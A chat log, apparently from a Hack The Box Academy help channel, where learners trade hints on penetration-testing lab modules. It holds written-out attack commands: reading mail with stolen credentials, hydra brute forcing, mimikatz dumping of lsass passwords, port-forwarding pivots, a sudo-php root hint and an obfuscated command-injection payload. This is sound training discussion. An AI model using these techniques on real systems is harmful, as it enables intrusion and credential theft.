#modules

someone has to do windows command line module 😂

Good thing I have a lot of leftovers for marking a section as complete lol

That icon look super fancy ❤️

Can someone give some assistance as to how to grab ||Tom's rsa|| from using openssl with imap? I logged in with his creds but not sure where to go or what syntax to use after performing|| 1 LIST "" * and then 1 SELECT INBOX (INBOX). How can I find the rsa and fetch it? ||

For mail, the easiest way is to use a mail client.

will the color change 😂 ?

@acoustic owl …like a graphical interface version instead of the open ssl

yea

hacktricks commands

you can also use pop3

you dont need the encrypted protocol

curl -k 'imaps://<IP>/INBOX;MAILINDEX=1' --user tom:<tom's password>

you enumerate before and you will see he only has 1 mail

with pop3 you can do it from telnet

root@kali:~# telnet $ip 110
 +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready 
 USER billydean    <<-- in our case 'tom'
 +OK
 PASS password     <<-- tom's password
 +OK Welcome billydean

 list            <<-- this is a pop command

 +OK 2 1807
 1 786
 2 1021

 retr 1          <<-- another pop command

 +OK Message follows
 From: jamesbrown@motown.com
 Dear Billy Dean,

 Here is your login for remote desktop ... try not to forget it this time!
 username: billydean
 password: PA$$W0RD!Z

of course you can use 993 and 995 ports for the encrypted version of the protocols but you dont have to

mail clients are just sending this commands in the underlying

@sly dome cool - ty

any time

@sly dome once in via like ssh...am i looking for the HTB user? Right now i see some sql stuff and all, but nothing too useful, but wondering if i need to log into sql somehow

hello everyone, any hint for a dictionary in the Service Authentication Brute Forcing exercises?

https://dontasktoask.com/

What have you tried, provide context, we should be able to look at your question and not have any questions to ask back.

kewl

I build a dictionary with cupp

Take a look back at the previous section (Personalized Wordlists). You're trying to brute b.gates, so use cupp to generate a list with information based on Bill/William.

I did already, this is the current dictionary I'm using to attack ssh service

is it going through the list or is it just failing to connect?

because I'm pretty sure that is on a different port than the normal 22

no, no, it's going thru the list, but it's taking so long....

I know BF taking time, but u know this is an exercise, I guess hasn't taking so long...

Yea, I remember the mutated passwords one took forever too, I don't remember this one taking that long though

ok., well waiting though

let's hydra do their job

After finishing the Advanced XSS and CSRF module, how would you further develop your knowledge base? Research papers?

send me a PM if you need help. It shouldn't take more then 5 minutes, I just ran it again and got it. Also, I know the lessons say use -t 4, but there isn't any configuration limit on the box

https://owasp.org/www-project-juice-shop/ has both and is a pretty recognized resource

I haven't been through that module yet though, so juice shop might be too low level. But it is at least more practice

Oh I've destroyed the Juice Shop a while ago

and I've done most labs I could find

I'm looking for more advanced stuff

Can't help you there then hah

which module was that

@sly dome nvm i actually got it...was tricky how lol

yea sql was open

if you do ss -lntp

didn't expect the end to be that

you see that

was the same as the mssql lab but with mysql xd

what is this o.O just popped up for me as well 10/30 and is a "point" a cube?

not sure

I think it's just another way to gamify the process

I just answered another question with 1 cube, gave me 10 points

Probably, but do we get something :D?

Probably not

ayo gib some cubes

I need cubes for the Tier III modules pls

Prob just gonna get plat sub

I am trying to run either this|| dig txt ww02.inlanefreight.htb @10.129.73.94|| or the zone with the www1 to try and read the TXT file but I get nothing returned. this whole module has been crap. I added the IP of the target and the domains to etc hosts, too and nothing...any advice here on how to read the TXT?

even when i run export TARGET - i get server can't find ww02 or www1

Perhaps you can't view those zones, try others

@fathom pendant ok let me retry that

I am redoing the Footprinting Hard Lab and I can not find the t** password, I remember it being in the user's history file once you accessed the server with the private key.

nope, try snmp enum

@fathom pendant question an I just perform the dig txt or is it better to run the export then nslookup TARGET one? Also...do I keep having to put the domains found in etc/hosts or not really?

Not really you can do dig query subdomain.inlanefreight.htb @ip

ok cool - ty

@fathom pendant got it - ty again

any idea on what im doing wrong to upgrade the meterpreter shell in the getting started knowledge check portion

why would you upgrade a meterpreter shell

trying to run the next command to elevate to admin but cant without sudo

i dont know lol but it appears i would need to, no?

to get sudo to work?

hardening your shell isn't going to get you privesc, go double check the section content

you dont need to upgrade your meterpreter shell. You just need to drop into a regular shell

view the meterpreter help info

i tried the shell command to drop into a system command shell but by that screenshot it like crapped out a bit

Now type “whoami”

ohhhhhhhhhhhhh

Yeeeee

www-data

now list out permissions of what users can do

sudo -l

dont walk them through the rest

the issue was solved, let them figure the rest out 😉

lol gotcha gotcha

im trying to figure out that next part after that myself lol

i see where i can run the content but confused on where to go from here myself

done, I sent a PM

nothing is coming back now?

Why are you making pics of your screen

When you can just make a screenshot and send that

lol thats a good question my bad

Evening all, just doing the Miscellaneous Technique task under the Windows Privilege Escalations. I've found 3 passwords none of which appear to work, would anyone be so kind enough to point me in the right direction please TIA

I think it should be the .exe in github

not sure

It's just a different tool that's used on Windows

is htb down again ?

Don't believe so I'm on it at the moment

huh i cant spawn targets nor pwnboxes

Yeah same here

Ah OK, just refresh everything and you are correct in that I now can't spawn a target

@languid fjord

What modue

I was doing windows Event Logs & Finding Evil

section: Windows Event Logs

I can't spawn a session or box either

yeah seems like targets are dead 😦

poked the infra team

Thanks

getting started knoweldge check - i think i have to run some command somehow to append the php file but im a bit lost. is my goal to upload a new php file altgoether and run it to create a reverse shell? or is it something else? i cant edit php itself

works again

Use gtfobins

You can run php with sudo privileges
Search how can you leverage it to gain a shell as root

targets? pwnbox? both?

Target at least, let me check pwnbox

kk, ty

works as well.

interesting, doesnt work for me still 😂

I tried to footprint the DNS and find the one that ends in 203. I used dnsenum with all the discovery txt files and found nothing. What I am missing?

Did you use the fierce wordlist? And did you do it against the right subdomain

I did, but need to check the subdomain part.

Do a zone transfer to the domain first to be sure you get all the subdomains

same.

no ip

which servers are you on ooc? @wet kite @slender shoal

I used the UK pwnbox Server

VPN is EU 2

hello,
i'm trying the password attack module and i got this error when i try running pypykatz

You should probably be running pypykatz on the target

it's a windows target without pypykatze on it
i'm supposed to import the lsass dump and use pypykatz on the dumpbut i got this error

You need to supply it with arguments

But also mimikatz exists

I did try recursion on subdomains, but that did not work.

Dnsenum doesn't catch all the original subdomains

That's why I said you need to query for them first

oh.. mimikatz works the same way ?

its up now

.... look at their names and think critically

Mimikatz = windows, pypykatz = domain joined linux

oh thx

Most of the time on windows targets they'll have the tools, if intended, in C:\tools

With lsass you can use secretsdump.py

in ctfs, does failing an educated bruteforce for massive wordlists usually mean that the login page isnt the concern and something more obscure is

It could be

wut does experience tell u

I dont participate in ctfs, and this channel really isn't for conversation about ctfs

http://dontrespondjustorespond

And I'm telling you that this channel isn't for that conversation

How about you actually stay on topic

youre already verified so you have no excuse, you can see all the channels

A third-party outage is causing some intermittent issues with spawning. We are currently investigating the problem.

@languid fjord is this counting towards cpts exam takers? Because my lab is not redeploying

You will be compensated time lost on the exam due to technical issues

Please contact customer support, and they will make it right

has been like 3 days whit this problems, will they be fixed?

Unfortunetly, as i said earlier, the issue is caused by a third-party, we are doing what we can in this situation

i understand

hope tomorrow it is fixed

i lost 2 days because whenever i try to study some module there is an outage

can anyone help me with command injection skill assessment? I'm managed to get the location of flag.txt and used a payload to move the flag to tmp folder, but it gave me 'access denied', then I used the same payload on copying but it gave me this error instead Error while copying from tmp/51459716.txt${LS_COLOR:10:1} ${PATH:0:1}flag.txt to 51459716.txt${LS_COLOR:10:1} ${PATH:0:1}flag.txt, can someone help me with this? thx!

hi I am trying to use DNS lists on seclists with nmap using dns-brute and its not working. would a zone transfer work better? this is for last section of enumeration with nmap? should I rely on zone transfers or brute forcing?

I'm assuming its one of those two because those are my two remaining options

am I wrong about this?

Try a different tool

I've been spawning a target for questions for about 15 min now. Is anyone else having problems?

same

But also i don't think that's the answer

ok

me too

so I can do everything I need with nmap?

@manic terrace and @bright quiver guys read what Emma said just 10 answers above yours, they are having issues with a 3rd party package... it's literally bolded.

do I need to transition to another tool or should I focus on DNS with Nmap

The hard lab?

yes

the hard lab

Reread the dns proxy section

ok

where's the dns proxy section?

I am looking in the nmap module and going through several sections

Under firewall IDS/IPS evasiln

ok cool

Instead of using their known port use -p-

I solved it

it took I while to figure out

I'm so proud lmao this took a LONG time

the answer turned out to be much simpler than I thought

can someone help me with this?

Why did you move it to tmp? I don't remember the module, but you need to escape from the 'mv' command to your own command.

why not just cat it

What was your payload?

I've just done the module

was it related to dns proxying? I'm just struggling with the same challenge lol

they have filtered space and some tools, you could still use base64, bash, other operators

yes it was

read that subsection under IDS/IPS firewall evasion section

just replace their exact scan with a -p- scan

yeah I just found it, indeed, you have everything you need to pass the challenge on that section

thanks for the guidance 🙂

could use a nudge on Attacking Common Services - Easy

Gonna need more context chief otherwise I'll just tell you to turn it on

just trying to figure out the other way of getting the flag

oh

¯_(ツ)_/¯

probably a reverse shell or something

I'm pretty sure it's like 90% the same steps then the last 10% you can do a couple things- i never looked into it tbh

no. its something else. Its easier than you'd think. I was overthinking it for a long time. you have to know the right protocol to attack then you have to kind of figure it out

its difficult I know

its something I struggled with for a while

@quaint hemlock search the forums dude.

Heya, Anyone have an issue when starting a Machine, that its up, can ping it but nmap shows no ports/services. I know from the lab ithere should be a SQL server running but nada. I tried to stop, restart the machine but I get an error. So I logged out and back in. Any ideas?

there's an ongoing issue

nods

hey guys i am 99,5% from cpts path and i am stuck on the Attacking Thick Client Applications, Skills Assessment III from ATTACKING COMMON APPLICATIONS anyone can i dm for help?

look up the walkthrough for the retired box "fatty"

iirc that's what that's about

Attacking web client thick applications

Doesnt matter

a segment of fatty is LITERALLY that section

watch ippsec's video on it

The button for fatty jar is not showing up after I updated it

Can't read the notes text

would ya look at that

Read my suggestion to look up the retired machine "fatty" that should help you, maybe you missed a step

Thanks I'll take a look at it . The pivot api video helped me

i've seen others get tripped up on the same thing so I don't think it's necessarily JUST you

(That section literally is just thrown in out of nowhere)

it was hard.

🤣 I've read everyone's frustration

Very. Very. Very. difficult.

note: "Fatty" was labeled as an "Insane" Box

^ because it makes you go insane😂

i mean the specs for box difficulty is generally the number of steps ¯_(ツ)_/¯

Hey everyone, I have some troubles.
I saved 500 cubes and have 3 options for which module to choose, but I have no idea which one to choose.
Can someone help me with it?
Modules:
Kerberos Attacks (tier 3)
Using CrackMapExec (tier 3)
Active Directory Bloodhound (tier 3)

100% Kerberos Attacks, the other two you could learn on your own

I agree.

which is best tier 3

i too got almost 500

new feature?

Yes

Hi all, I am stucked at Credential Hunting in Linux. I'm having issues running lazagne in the target's machine. I successfully gained an initial foothold and now attempting to gain Will's password. Note: I transferred the zipped file.

Did you end up figuring this one out? I'm running into the same issues

Have you uploaded the whole zip file or just a part of it?

The whole zip file

hi

Anyone already done Shells & Payloads live engagement? i have some questions

Hello, im currently doing the "getting started" module and in the "basic Tools" section i tried to answer the Question, but the flag i answered seems to be false,

did i forgot something?

yes, the port

where to with some minor tweak suggestion? in the module changelog the link when clicking on one of them is "/module/XY" which, for locked modules, will just show the "Unlock for XX" page. instead the link should go to "/module/details/XY" which acutally gives information about the module, and one can unlock after reading whats in the module 😉

this is more suitable to be done via the support in the website

uhm.... need a howto for the chatbot 😄 how do i actually comment here?^^ it justs closes the chat after telling me to comment

Hello sir. Could we go in DMs ?

hi im new! which is the channel for super newbie questions?

Read and follow #welcome

then you will see all channels

Hi!! Can someone help me with this? Im trying to conect to a MSSQL server... (doing AD Enumeration & Attacks - Skills Assessment Part II - Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. )

Is your PC in the 172.16.7.x network?

Yes

And there's a port in the IP for Mssql service

Using impacket lead to the same error

Hey yo beautiful people

I am stuck at AD Enumeration & Attacks - Skills Assessment Part II

Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

I am local admin on SQL01, enumerated like a maniac but can't move anywhere

Yes, the whole zip file. It gives some error about the psutil module

Inveingh, mimikatz, LaZagne, manual enumeration, ACLs

what can you do with your admin creds, whats a common administrator password usage flaw in a network...

I don't have creds for my admin user, I priv esc with something else 👀

also, that super long passord... I used crackmapexec to passowrd spray, as well as kerbrute, it didn't lead me anywhere

It should work, but you could also play with metasploit for that, there is a post exploitation module that does the exact same thing, thats what I used.

thats a spoiler btw
But I believe you have answered yourself 😂

damn sorry, spoiler removed

hello everyone, I'm in the SQL injection fundamentals and I had to use a specific command to bypass authentication. My question is: is there a way to know which command in the list on PayloadsAllTheThings is gonna work or it's just literally trial and error until one works? 🤔

Know what to do now yeah?

I am assuming... I thought that same exploit would work only with service accounts... let me go back and try

I have searched through my notes. I accessed the database from the host ||skills-par01|| with ||mssqlclient.py||

common administrator password flaw. - Hint

oh my, I see now

thank you heaps for this!!

HTB profile for some creds? @faint rampart

dms? 👀

sure 👍

can i DM you?

sure

wasssuuuuuuuup

@acoustic owl Could we go in Dms for some questions ?

anyone have an idea why i keep getting this

nslookup -query=a 10.129.73.220
Server: 1.1.1.1
Address: 1.1.1.1#53

** server can't find 220.73.129.10.in-addr.arpa: NXDOMAIN

kerberos module: unconstrained delegation users challenge. followed the steps and have the DC ccache but keep getting this response from secrets dump

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...

have re-imported the ccache as well as tried again from the start and the same issue. I mean I have the tgt for the DC so unsure why secretsdump isn't working

fixed, hosts file wasn't resolving the DC for some reason, had to specify the DC ip manually

can anyone assist with this question? What is the FQDN of the IP address 10.10.34.136?
I ran this but I do not see the IP ||dig @10.129.73.220 NS axfr inlanefreight.htb|| or FQDN show up?

Remember a DNS lookup maps a hostname to an IP address, you're looking to do the reverse (that's a hint). The module should have an example of doing that exact thing if you're really stuck.

ok - ty

got it

anyone run into issues where when trying to run this command:|| curl http://10.129.73.220 -H "Host: www.inlanefreight.htb"|| - it just disappears? I am trying to do the virtual host exercise

what happens when you hit 30 in streak?

It says goals completed

hehe ok

is it fixed?

the outage problrms

any news?

You should stop learning right now lol

Sweet!

Read 3 modules, mark as completed There we go, done for the week!

Know everything now.

Unitl next week then there is more to learn...

Oh, then you study for CPTS for two - three years lol

Hope you take good notes 😂

No, my notes are honestly not good. But I'm working on it

Better luck next year!

Hi got a question for you guys Iam at the Attacking common services assasment module medium and iam trying to bruteforce me way into the FTP . what i would like to know is which pw list and user list you used for that challange 🙂 ?

And 1 extra year for report writing

With the new tool, this should be quick and easy. 😉

Yeah, have not tried it yet hopefully this Sunday

I haven't tried it yet either
But I should definitely do it. Because I actually want to use it for the CDSA exam

Is there a way to reset academy modules to do them again, or is it just "go back and review" it type deal? I feel like I'm not quite retaining the info as much as I should be and would like to do it again. There is a retake module button. I am dumb, ignore this.

@next bronze footprint

any hint on how to find HTB password on footprinting hard lab? i really did everything and got the ssh private key and logged in as Tom

still no HTB password to be seen

enum the machine

ports, files etc

hi

HEllo

still struggling

searched for hidden files but nothing intresting

taken a look at history?

saw a mysql command yes

but i don't have the password

Sure about that? 👀

waitt ....

wait wait

i think i have

lmaoooo

Have fun buddy. XD

completely forgot about it hhaha

a better approach was enumerating ports

in real enviroments you wont find a command history

(likely)

I agree.
It was a second hint hehe.

I agree, but the fact of its existence is hint to an internally running service even tho its content should typically be redirected to devnull

how do you enumerate ports

inside ssh

?

netstat -tulnpa
ss

ss -lntp

ss is a unix command

netstat maybe is not installed

does it matter? i mean rethink your question

you just have command execution, does not matter the how

yeah, net-tools package isnt always installed.

when i enumerate port 3306 for mysql its says closed?

please be more concise

i used nmap to scan the target IP on port 3306 which is the sql port and it's says its closed

and

can be open to the inside

yeah but how can u know that it's can be opened from the inside

ss -lntp

is a basic command when enumerating a unix machine

those you saw on nmap are the ones open to 0.0.0.0

when i use it my ssh sessions crashes lol

very weird

i will try running it again wait

maybe a RAM problem?

or does it take time to execute that command?

no xD

:3

Have you tried netstat

netstat works

thanks man

Yw

thats totally weird HAHA

i am going to check in my side

can i DM you ( im at the same point)?

I guess it’s just my Vm machine

probably yes

Since i allocated only 7gb ram?

i dont think so

is not aproblem of resources

Can a slow internet cause that problem?

how can i connect to the internet

from workstation

this isnt tech support. read #welcome

\

\}]"

I agree

might be weird but

where can i report typos in moudles? 😅

#858470491676737536

Hi, I am currently doing the IDS avoidance with nmap and I noticed in one of the labs you can only get a connection to a certain port when the source port is an allowed port. So I am using --source-port [port] but then when I do -sV or anything using NSE, it's not using the source port, just a random one. I used --packet-trace to get that info.

are you using --source-port= ?

Hi everyone! Recently I discover a vulnerability in my company’s website. However, I don’t know the best way to report it without causing problems for myself. What should I do?

Are you running with sudo or as root?

but also it highly depends on the type of scan

How did you discover the vulnerability, just report it to IT

your company probably has some sort of reporting process

just --source-port [port] works too

thx

Tested that one too just to be sure, but it's not working either

In Linux Fundamentals > File System Management, Question is How many disks exist in our Pwnbox? The answer should be 1 as shown in screenshot, rather than 3.

Not sure why the copy and paste not working for screenshot

Read and follow #welcome

So excited to study and the boxes is not working. Slamming my keaboard.. 500€ for this (:

Errors sometimes occur on the best servers. 😉

@acoustic owl I dont like that I pay first of all 500€ to use the modules, I understand even AWS/Azure have problems but 5 days?`
Also, second thing im fucked about is the lie that the CBBH exam would be corrected in 20 days, its been 30 days

There is only 1 disk and 3 partitions.

The best thing to do is to contact support, as Earthbuffet has already told you. There is nothing we can do here in both cases

It is 20 business days. Slightly different but affects the timeline quite a bit.

But, they do provide good feedback which is a huge win and tells you what to improve on even if you pass.

Yes of course, that is why im doing these exams because everyone said they are giving nice feedback and I can use it to actually be better at reporting. But honestly, after 1month you kind of lose motivation if there is no response

Sometimes you just wanna blow off some steam, and when there is no response on exam + PWNBOX down, then one can only have so much patience

If it truly has been that long I would contact support (usually pretty fast response) and if it was mid exam definitely reach out to support.

I can understand you. Nevertheless, please be patient.
The guys are very busy at the moment. That's why it's taking longer than normal.

Does anyone has an answer for this? I also tried with --source-port= but it's the same thing. it's for the Enumeration with NMap module, final lab.

Try it in the PwnBox, not from your VM

do it with sudo

ran with it already

why would it change how nmap works? I am using parrot with the latest updates. I'll give it a try anyways

If I am not mistaken, then it is not a problem with nmap, but with the VPN. Try it from the PwnBox.

it really seems to be comming from nmap, when using --packet-trace I can see the initiating port. it's 53 for the port scan but some random port when it's NSE.

I just tried and got the same result with PwnBox.

ls

Send me your command in a PM. Then I'll take a look at it.

If you have lost exam time due to technical issues on their side, you must contact support, they will credit you the time back

If it is one of the questions where you have to get the service banner try a different command mentioned in the module.

Exactly -- It's like HTB is wanting to punish those who truly pushed hard on Academy... I've got 89 of 96 module completion badges...

its 30 points. not answers

30 answers per week is quite the ask

Yeah, but when there are physically only 7 modules which I have not completed, it's very restricting on what I have to choose from...

yeah I get that haha, just was stating its different

For Windows Privilege Escalation - Pillaging: I need to get a cookie to log into the slack website, but I can't figure a way to transfer the cookies.sqlite db to my main machine, unless theres a different way? S:

Don't remember that specific module, but for file transfer from windows to linux my fave is if I have RDP use the /drive option on xfreerdp, failing that an SMB share is my next go-to

I am running nmap -sV but receiving "1 service unrecognized despite returning data." for the only port that I need

I tried doing smb but you need admin password afaik, I don't see an option for the /drive on xfreerdp?

wrt smb -- you can host an smb share on your linux box, and then copy from windows to your linux smb share. but if you have rdp, I usually do: /drive:test,/tmp -- where it creates a 'test' folder on windows that maps to the /tmp folder on linux

would that still work even though the VM has no internet access?

If the VM has no connectivity, how are you connecting to it? If you're able to connect to it, it's got to have connectivity... Again, I'm going blind -- while I've done the windows priv esc module, it was a long time ago -- just giving generalized advice

through RDP, this whole section has me a little confused, I have to transfer a cookies.sqlite db to it, I thought I could just do some basic upload stuff then I realised it has 0 internet access

and are you RDP'ing from a Linux or Windows host?

Linux

atm I'm using remmina to RDP into it

I know nothing about remmina. Just xfreerdp.

it acts similar to xfreerdp but its just a GUI instead of a command line

xfreerdp /v:IPADDR /u:USERNAME /p:PASS /drive:test,/tmp

thank you <3

it worked perfectly, thank you so much! :)

don't forget /dynamic-resolution

almost added it, but was trying to avoid detracting from the key focus, which was how to xfer a file -- but yes, absolutely spot-on 😂

I honestly muscle memory it at this point lol

small question, I've got the password hash for the local admin, but I cant figure out "what" part is the actual hash, its the 2nd part right?

woops 👀

I believe one of the sections goes over the parts of it

NT and LM hashes separated by :, but which is which?

NT first LM second i thought lol

don't have my notes on me atm

that's evil 🥹

it just says "Submit the Administrator hash as the answer." but I'm not sure if they want the entire hash or a specific part, none of them seem to be working for me : (

what exercise is this again?

Pillaging

i just checked my notes an ntlm hash is structured as [LM]:[NT]

uuuh I haven't done that one

its the last question for that section, I've obtained the SAM and SYSTEM files required, dumped the hashes but I'm unsure what formatting they want :l

think back to when you've done PTH

how was that structured

Haven't done PTH in ages D:

then refer to your notes

i'm still curious about the rewards tbh

i would answer this, but if you google this question it's literally the first result

same here! I wonder how many weeks it takes....

Its fine I solved it, I realised there was two different backups which both had two different hashes..

and I wonder if I can horde answers and just submit them weekly

That's just stupid tbh

I'd rather just complete it

There's definitely enough content on the site

No

for the weeks when I can't study 👀

It's still stupid

Farming rewards on a hacker's training platform 🙃 yeah I agree it is stupid

BTW how do they assign points? When I solved a 1 cube exercise I felt like I got more than 1 point

¯_(ツ)_/¯

Probably a test of the feature since no announcement about the feature

uuuh so there was no announcement, I thought I missed it as I was glued to CPTS

It’s still very beta and we’re working things out

It would have been nice to have a beta rollout announcement but if there's a helpdesk article for it to point to that'd also be nice

I’ll note it for the team

I dont think the pwnbox server thing on academy was announced either, but I might have missed it

hello, I have a question regarding the Linux Fundamentals module, is this the right place to ask for help?

basically Im trying to install docker in my Pwnbox but it seems to have no internet connection

You're not gonna be able to access internet in pwnbox

It's extremely limited

You don't need to set up a docker container at all

cant even apt-get install docker?

You're not required to set up a docker instance

I know I know, I just wanted to test the bash script given by the lesson https://academy.hackthebox.com/module/18/section/2097

If you want to, you're better off using your own vm

thanks for the heads up @fathom pendant

Anyone else unable to connect to Academy vpn?

no, but everytime i try to use the accesschk tool it kills my network on my vm in the module im doing

so im obviously doing something wrong strill

still

@_@

hello y'all, anyone receive this message in the last question into Brute Forcing - Service Login :

ftp> get flag
local: flag remote: flag
local: flag: Permission denied

You're running ftp from a directory you don't have write access to

hmm.... lemme double check

Hello everyone. I'm working on the SQLMap Essentials, Attack tuning. I'm pretty sure I have the flag5, but it keeps telling me its not right. At first I wasn't connected to the vpn and didn't realize it. which on it's own is weird because i was able to connect to the db, the website and everything. I got a screen-shot but I'm not sure how to cover up the spoilers.

Just don't include the flag at all in your post, as it's still a spoiler, you can go into a software like paint and block out everything between {}

uhh i had already posted it with the spoiler thing, I think i deleted it .

sorry

can I dm you the flag?

I haven't done this module

oh ok.

I don't come in here much, but when I have I think I always see u. So i thought you were.......tech support. lol jk

Any chance of a nudge for Credential Hunting in Linux in the Password Attacks Module? I've been at this for two days now and I can't seem to get ahold of what they're looking for...

I've just cracked the password for a totally different challenge on the same box and I'm beginning to get confused.

you can try to check the password stored in the browser

firefox_decrypt.py is helpful

Interesting. I thought I had been by that but I imagine I brushed by it without spending enough time. Thanks for the tip!

enjoy your module, bro!

Could anyone tell me why I can't login to htb-student with IP:172.16..5.225 in https://academy.hackthebox.com/module/143/section/1489 ?

I'm working on the Pivoting Tunneling and Port Forwarding skills assessment. I've RDP into the first pivot host on domain 172.15.5.x

I found user v***** but can't find a way to get his credentials. I can find mimikatz on the host, can't get it on the host, tried attacking lsass and Sam, tried looking for files that have the users passwords in either plaintext or hash. I can find nothing. Is there something I'm missing?

Because you're not supposed to SSH, you're supposed to RDP to the target and then do what the questions ask you to do, which none of them involves interacting via SSH with this target.

really ?

RDP to 10.129.201.234 with user "htb-student" and password "Academy_student_AD!"

Have you read it ? ))

maybe you can use mimikatz for this case

mimikatz # sekurlsa::minidump C:\Users\<m*_user_here>\AppData\Local\Temp\lsass.DMP
mimikatz # sekurlsa::logonpasswords

In which module is this snippet?

ACTIVE DIRECTORY ENUMERATION & ATTACKS

But I don't see mimikatz.exe on the host

Website support isn't on the discord

C:\tools

you can transfer the mimikatz tool to the target machine, bro

No such directory

Then do what satellite said, transfer file

transfering your tool to the target machine

I tried, but maybe I just couldn't get the transfer right, so I thought that wasn't what I was supposed to do

Already found it, wait a sec i'm trying to connect via SSH here

I'll try that again more carefully

this is a transfer file guide for you:

Steps to transfer files from windows to linux.
1 - Install pyftpdlib in our linux machine > pip install pyftpdlib
2 - Create a directory in the linux machine > mkdir files_from_windows
3 - Start frp server by specifying the dir_name and allowing write permissions >  python3 -m pyftpdlib -d files_from_windows -w
4 - Navigate to the windows quickaccess pane and search for the ftp server > ftp://10.10.14.75:2121/
5 - Copy and paste the needed files to the folder.

and another way with xfreerdp

xfreerdp /u:<username> /p:<password> /v:<IP> /drive:data,/tmp /dynamic-resolution

I have my files hosted on a local nginx server 10/10

for your case, you can use xfreerdp

yes, and on the Windows machine, we can access our attack's IP machine and get the file. @pure sorrel

I need to beef up my nginx server to make it cooler

HTB is refusing to give me a box for the AD Skill Assessment part II

can I vent here?

They're currently having issues since like last week

Some backend 3rd party stuff

It's been intermittent and being looked into

the platform is pulling my leg, it gives me box for the part I but not for part II

Thanks btw, I'll be more patient

I used xfreerdp with the shared drive, I must have just had bad syntax, it's been a long day 😴
Thanks for your help

xfreerdp way will be like this, and you can transfer any files to the Windows machine from your kali/parrot via a new drive @pure sorrel

Bash is clear

yes, sadly i do cls on bash and clear on cmd/powershell always get it wrong on the first time

Yea I used it earlier today for another module, so I must have just carelessly done it wrong

to transfer files I go with the long way:
python3 -m http.server 8000 is going to open a quick http server on that specified port, in the same folder you are running the command

I needed to type password word by word ))

alias cls=clear

Probably didn't copy it properly

I think you can actually use secretsdump.py from your own VM, but i'm not sure

Only if you have a pivot through the network

Or if you transfer files back

yes, file transfer is a core technique, anyway, we can do it according to our situation accordingly

Yea, i'm not sure how i did at the time but i think i used what was showed on port forwarding with windows netsh. Either this or the technique with chisel

@pure sorrel Dante & Zephyr are cool and friendly for you to practice the Pivoting technique, Offshore you will master this technique lol

Look into ligolo-ng

I'm going to add those to my list. Trying to finish the pentester path first, then get into some boxes

@marble raft for the Skill Assessment of the AD Enumeration & Attack module:
On the Foothold machine, you can use Netsh tool to forward port:

PS C:\> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=<foothold_IP> connectport=3389 connectaddress=<Connect_IP>

and then you can RDP to the Connect_IP

xfreerdp /v:<foothold_IP>:8080 /u:<username> /p:<password>

Have a question for the group. Been working on Q8 of the AD Enumeration & Attacks - Skills Assessment Part II for the last few days. I got system on SQL01 and got the admin hash so I can WINRM into SQL01 now. I have 2 users that can RDP into MS01 but am having a difficult time trying to get to admin on that box. Any hints would be apperiated. I've been doing these skills assessments for what feels like weeks now

To add on that: completely unrelated, but another technique:
ssh -D 9050 username@ip to ssh into the foothold, the -D enables dinamic port forwarding on port 9050, then you change your /etc/proxychains.conf file to include the line 127.0.0.1 9050 and use xfreerdp as proxychains -q xfreerdp /v:<foothold_IP>:8080 /u:<username> /p:<password>

is this the correct channel for help?

for module help, yes.

when I run nmap -sV, the version of the service running on the specific port I need is not shown, but all others are shown

however, it does say "1 service unrecognized despite running data."

which module and section?

well, shit, my VM froze

the module is Getting Started. the section is Service Scanning

im on the zap scanner module of using web proxies, and it says "once you find the high level vulnerability". ive generated a report with the active scanner however no high level vulnerabilities show up - only medium and low. i also tried the regular zap spider but to no avail.

Can you dm me with more details? @heady estuary

@slender shoal I used the Pwnbox and it worked. it wasn't working on my VM. which is still odd... but thank you

Good stuff

is this common with HTB?

i generally dont have those issues

mmmh more common that I'd like that to be, but realistically 1 every 15 exercises in the CBBH Path will give you that issue

sorry does anyone know anything about this

what module is that?

I don't think I have done anything with zap

as said "im on the zap scanner module of using web proxies"

for cbbh

@rotund crater okay thank you. good to know.

Ok let me check my notes

and my HUD in the zap browser is gone and idk how to bring it back

ok i just restarted session and the HUD is back nevermind

Are you doing that from your own kali or from the pwnbox?

my own laptop

I have no notes for this, it probably pissed me off lol

uhm try switching to the pwnbox, I think this is what happened

lol ok

ty

Zap and I are not friends anymore, now Burp is my friend

ZAP is a bit funky, but it looks like you just need to follow the section pretty closely

yeah i like burp more definitely

i did except without using the HUD, didnt think that would change anything

the HUD doesnt work at all in the pwnbox and im getting the exact same output as i am on my laptop. i just wanna go hooomeee

now im just too upset to continue

i followed the module word for word in a new untouched pwnbox and it didnt work

Any able to help me with the DNS section of foot printing please? Can't make sense of the first question
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain. - Not sure what they're asking for exactly, no flags found when interacting

Because it's not asking for a flag

__F__ully __Q__ualified __D__omain __N__ame

I get that, but there's an answer box

Yes

dig inlanefreight.htb @10.129.14.128

The answer is in the form of a Fully Qualified Domain Name

Not a flag

Not every answer in academy is gonna be in the format of a flag

I know

Try dig axfr inlanefreight.htb @ip

Or dig ns inlanefreight.htb @ip

I have, and got the zone transfer flag

You're likely overlooking the answer

its on his screen im sure

Oh I'm 100% sure

cute 😂

It's just a fundamental misunderstanding of what fqdn means

No no you misunderstand, maybe I did a poor job of explaining my predicament

I didn't understand what the question was asking of me

And I explained it to you

If you're really unsure of what a fqdn is, Google is free

i sense some tention guys

I'm not unsure of what fqdn is

I can only lead you so far to the answer

Google

You didn't lead me at all because you misunderstood lmao

CHILL

No. I figured that expanding the acronym might help you further understand.

Nah, I just didn't understand what the queston wanted in terms of an answer, I answered the other questions just wasn't sure what they were after for this one

Use ctrl+f to search for fqdn on that section, it does explain it on the page

Albeit briefly

Can I ask if there is anyone besides me doing the Active directory module in CPTS that have problem with VPN connections?

They've been having backend issues lately

I find it strange other ppl can do modules though

I RDP and after 30 sec it closes down 😦

try to regen your vpn and ensure its a tcp vpn pack that might also solve some of your issues

Actually smart suggestion, only used UDP. Will give it a try

Good morning everyone - is anyone able to help me with Enumerating AD users? I am trying to use the Find-ForeignGroup SharpView command but getting no output. That is the command given to us in the module

Nevermind I got it, that is not the command you need. For the next homie: Just look for administrators.

Hey, is there anyone in the support team who can help me troubleshoot why i cant access my ProLabs that i just bought?

Contacting support on the platform is the best bet: https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Great thanks

Make sure you're using the correct vpn key, I haven't bought prolabs but I'm assuming they have a different key as they do for VIP, academy, and seasonal

